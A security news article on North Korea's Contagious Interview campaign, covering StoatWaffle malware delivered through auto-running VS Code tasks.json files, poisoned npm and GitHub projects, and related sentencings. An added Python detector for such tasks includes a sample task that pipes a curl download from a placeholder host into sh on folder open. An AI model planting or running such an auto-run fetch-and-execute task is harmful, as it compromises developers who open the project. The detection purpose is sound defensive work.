The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as StoatWaffle that is distributed via malicious Microsoft Visual Studio Code (VS Code) projects.
The use of a VS Code "tasks.json" file to distribute malware is a relatively new tactic adopted by the threat actor since December 2025, with the attacks leveraging the "runOn: folderOpen" option to automatically trigger execution whenever any file in the project folder is opened in VS Code.
“This task is configured so that it downloads data from a web application on Vercel regardless of executing OS [operating system],” NTT Security said in a report published last week. “Though we assume that the executing OS is Windows in this article, the essential behaviors are the same for any OS.”
The downloaded payload first checks whether Node.js is installed in the executing environment. If it is absent, the malware downloads Node.js from the official website and installs it. It then launches a downloader, which periodically polls an external server to fetch a next-stage downloader that exhibits similar behavior by reaching out to a different endpoint on the same server and executing the received response as Node.js code.
StoatWaffle has been found to deliver two different modules –
- A stealer that captures credentials and extension data stored in web browsers (Chromium-based browsers and Mozilla Firefox) and uploads them to a command-and-control (C2) server. If the compromised system runs macOS, it also steals the iCloud Keychain database.
- A remote access trojan (RAT) that communicates with the C2 server to fetch and execute commands on the infected host. The commands allow the malware to change the current working directory, enumerate files and directories, execute Node.js code, upload a file, recursively search a given directory and list or upload files matching a certain keyword, run shell commands, and terminate itself.

“StoatWaffle is a modular malware implemented by Node.js, and it has Stealer and RAT modules,” the Japanese security vendor said. “WaterPlum is continuously developing new malware and updating existing ones.”
The development coincides with various campaigns mounted by the threat actor targeting the open-source ecosystem –
- A set of malicious npm packages that distribute the PylangGhost malware, marking the first time the malware has been propagated via npm packages.
- A campaign known as PolinRider has implanted a malicious obfuscated JavaScript payload in hundreds of public GitHub repositories that culminates in the deployment of a new version of BeaverTail, a known stealer and downloader malware attributed to Contagious Interview.
- Among the compromises are four repositories belonging to the Neutralinojs GitHub organization. The attack is said to have compromised the GitHub account of a long-time neutralinojs contributor with organization-level write access to force-push JavaScript code that retrieves encrypted payloads from Tron, Aptos, and Binance Smart Chain (BSC) transactions in order to download and run BeaverTail. The victims are believed to have been infected via a malicious VS Code extension or an npm package.
Microsoft, in an analysis of Contagious Interview this month, said the threat actors obtain initial access to developer systems through “convincingly staged recruitment processes” that mirror legitimate technical interviews, ultimately persuading victims to run malicious commands or packages hosted on GitHub, GitLab, or Bitbucket as part of the assessment.
In some cases, targets are approached on LinkedIn. However, the individuals chosen for this social engineering attack are not junior developers, but rather founders, CTOs, and senior engineers in the cryptocurrency or Web3 sector, who are likely to have elevated access to the company’s tech infrastructure and cryptocurrency wallets. A recent incident involved the attackers unsuccessfully targeting the founder of AllSecure.io through a fake job interview.

Some of the key malware families deployed as part of these attack chains include OtterCookie (a backdoor capable of extensive data theft), InvisibleFerret (a Python-based backdoor), and FlexibleFerret (a modular backdoor implemented in both Go and Python). While InvisibleFerret is known to be typically delivered via BeaverTail, recent intrusions have been found to distribute the malware as a follow-on payload, after leveraging initial access obtained through OtterCookie.
It is worth mentioning here that FlexibleFerret is also known as WeaselStore. Its Go and Python variants go by the monikers GolangGhost and PylangGhost, respectively.
In a sign that the threat actors are actively refining their tradecraft, newer variants of the VS Code projects have eschewed Vercel-based domains in favor of GitHub Gist-hosted scripts to download and execute next-stage payloads that ultimately lead to the deployment of FlexibleFerret. These VS Code projects are staged on GitHub.
“By embedding targeted malware delivery directly into interview tools, coding exercises, and assessment workflows developers inherently trust, threat actors exploit the trust job seekers place in the hiring process during periods of high motivation and time pressure, lowering suspicion and resistance,” the tech giant said.
In response to the continued abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (version 1.109) that introduces a new “task.allowAutomaticTasks” setting, which defaults to “off” in order to improve security and prevent unintended execution of tasks defined in “tasks.json” when opening a workspace.
“The update also prevents the setting from being defined at the workspace level, so malicious repositories with their own .vscode/settings.json file should not be able to override the user (global) setting,” Abstract Security said.
“This version and the recent February 2026 (version 1.110) release also introduce a secondary prompt that warns the user when an auto-run task is detected in a newly opened workspace. This acts as an additional guard after a user accepts the Workspace Trust prompt.”
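As an added example (not code from the article or from any of the vendors cited), the following Python checker flags the auto-run mechanism described above: it parses a repository's .vscode/tasks.json, which VS Code reads as JSONC (comments and trailing commas allowed), and reports every task whose runOptions.runOn is "folderOpen". The sample tasks.json and the example.invalid URL are constructed for illustration.

```python
import json
import os
import re

# Constructed sample of a tasks.json carrying an auto-run task (not from the campaign);
# VS Code reads this file as JSONC, so comments and trailing commas are legal here.
SAMPLE_TASKS_JSON = r'''{
  // runs as soon as the folder is opened and Workspace Trust is granted
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "curl -s https://example.invalid/stage1 | sh",
      "runOptions": { "runOn": "folderOpen" },
    },
    { "label": "test", "type": "shell", "command": "npm test" },
  ]
}'''

def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments (but not inside strings) and trailing commas."""
    no_comments = re.sub(r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/',
                         lambda m: m.group(1) or "", text, flags=re.S)
    return re.sub(r',(\s*[}\]])', r'\1', no_comments)

def find_autorun_tasks(text: str) -> list:
    """Return label/type/command of every task configured to run on folderOpen."""
    doc = json.loads(strip_jsonc(text))
    hits = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            hits.append({k: task.get(k) for k in ("label", "type", "command")})
    return hits

def scan_tree(root: str) -> dict:
    """Walk a checkout and map each .vscode/tasks.json path to its auto-run tasks."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in files:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                try:
                    hits = find_autorun_tasks(fh.read())
                except json.JSONDecodeError:  # an unparseable tasks.json still merits a look
                    hits = [{"label": None, "type": None, "command": "<unparseable>"}]
            if hits:
                findings[path] = hits
    return findings
```

On VS Code 1.109 and later the task.allowAutomaticTasks setting defaults to off, so a check like this is mainly useful for reviewing incoming repositories on the CI or code-review side before anyone opens them in an editor.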
In recent months, North Korean threat actors have also been engaging in a coordinated malware campaign targeting cryptocurrency professionals through LinkedIn social engineering, fake venture capital firms, and fraudulent video conferencing links. The activity overlaps with clusters tracked as GhostCall and UNC1069.
“The attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal,” MacPaw’s Moonlock Lab said. “The campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.”
The findings come as the U.S. Department of Justice (DoJ) announced the sentencing of three men — Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 — for their roles in furthering North Korea’s fraudulent information technology (IT) worker scheme in violation of international sanctions. All three individuals previously pleaded guilty in November 2025.
Phagnasay and Salazar were each sentenced to a few years of probation and a $2,000 fine. They were also ordered to forfeit the illicit proceeds gained by participating in the wire fraud conspiracy. Travis was sentenced to one year in prison and ordered to forfeit $193,265, the amount earned by North Koreans through the use of his identity.
“These men practically gave the keys to the online kingdom to likely North Korean overseas technology workers seeking to raise illicit revenue for the North Korean government — all in return for what to them seemed like easy money,” Margaret Heap, U.S. Attorney for the Southern District of Georgia, said in a statement.
Last week, Flare and IBM X-Force published a detailed look at the IT worker operation and its internal structure, highlighting how IT workers attend prestigious universities in North Korea and undergo a rigorous interview process themselves before joining the scheme.
They are “considered elite members of North Korean society and have become an indispensable part of the overall North Korean government’s strategic objectives,” the companies noted. “These objectives include, but are not limited to, revenue generation, remote employment activity, theft of corporate and proprietary information, extortion, and providing support to other North Korean groups.”